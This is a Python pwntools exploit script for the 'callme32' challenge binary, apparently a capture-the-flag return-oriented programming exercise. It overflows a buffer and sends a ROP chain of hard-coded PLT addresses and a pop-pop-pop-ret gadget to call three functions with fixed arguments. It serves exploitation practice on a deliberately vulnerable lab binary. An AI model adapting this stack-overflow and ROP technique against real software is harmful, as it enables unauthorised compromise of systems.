callme32
#!/usr/bin/env python
from pwn import *
# pwntools global settings for the challenge binary: 32-bit x86 on Linux.
context(arch="i386", os="linux")
def main():
    """Spawn ./callme32 and send it a ROP chain calling the three callme_* entries.

    The chain returns into callme_one, callme_two and callme_three (via their
    PLT stubs) in turn, passing the arguments (1, 2, 3) to each, as the inline
    comments of the original write-up describe.  All addresses are hard-coded
    0x0804xxxx values, so this presumably only works against the non-PIE
    challenge build it was written for -- confirm against the target binary.
    Requires pwntools (``from pwn import *``) and ./callme32 in the cwd.
    """
    conn = process('./callme32')

    # Three 32-bit little-endian integers: the argument triple (1, 2, 3).
    args = ("\x01\x00\x00\x00"
            "\x02\x00\x00\x00"
            "\x03\x00\x00\x00")

    # Used as the return address of callme_one/callme_two: presumably a
    # "pop; pop; pop; ret" gadget that discards the three argument slots so
    # execution continues at the next PLT address in the chain -- verify.
    pop3ret = "\xa9\x88\x04\x08"

    chain = [
        'A' * 44,              # filler; 44 presumably reaches the saved EIP (challenge offset)
        "\xc0\x85\x04\x08",    # callme_one@plt
        pop3ret,               # return address after callme_one
        args,                  # callme_one(1, 2, 3)
        "\x20\x86\x04\x08",    # callme_two@plt
        pop3ret,               # return address after callme_two
        args,                  # callme_two(1, 2, 3)
        "\xb0\x85\x04\x08",    # callme_three@plt
        'A' * 4,               # dummy return address: nothing runs after callme_three
        args,                  # callme_three(1, 2, 3)
        '\n',
    ]
    payload = ''.join(chain)

    # Drain the banner, deliver the payload, then show whatever the target prints.
    print(conn.recv(100))
    conn.send(payload)
    print(conn.recv(100))
if __name__ == '__main__':
    # Only run the chain when executed as a script, not on import.
    main()